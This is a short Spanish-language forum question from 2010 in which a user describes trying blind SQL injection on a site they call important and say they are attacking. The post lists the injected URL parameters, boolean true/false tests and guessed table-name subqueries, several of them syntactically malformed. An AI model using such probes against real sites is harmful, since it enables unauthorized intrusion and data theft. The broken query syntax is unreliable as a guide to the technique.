[Duda]Blind sql inyection.

volteo0101 · 24 Diciembre 2010, 03:53 AM

buenas,estuve leyendo algo sobre blind sql inyection.

y me tope con una web similar a ..

ejemplo.com/archivo.php?id=1

Mostraba unas contrataciones ,

al poner..

ejemplo.com/archivo.php?id=1 and 1 = 1 --

Mostraba las contrataciones ,

Al poner..

ejemplo.com/archivo.php?id=1 and 1 = 0 --

No mostraba nada, suponia que habia un blind..

luego intente hacer lo siguiente..

ejemplo.com/archivo.php?id=1 and (Select (*) from admin) --

No mostraba nada..

ejemplo.com/archivo.php?id=1 and (Select (*) from noticias) --

No mostraba nada..

ejemplo.com/archivo.php?id=1 and (Select (*) from mysql) --

tampoco .

probe tambien con cout.

ejemplo.com/archivo.php?id=1 and (Cout(*) from mysql) --

Nada.

Es blind sql inyection, estoy haciendo algo mal?¿ , la pagina que vulnero es una importante bien hecha, no creo que no tenga ninguna de las tablas..
sera un switch ?

saludos.

Test Foro de elhacker.net SMF 2.1

[Duda]Blind sql inyection.

volteo0101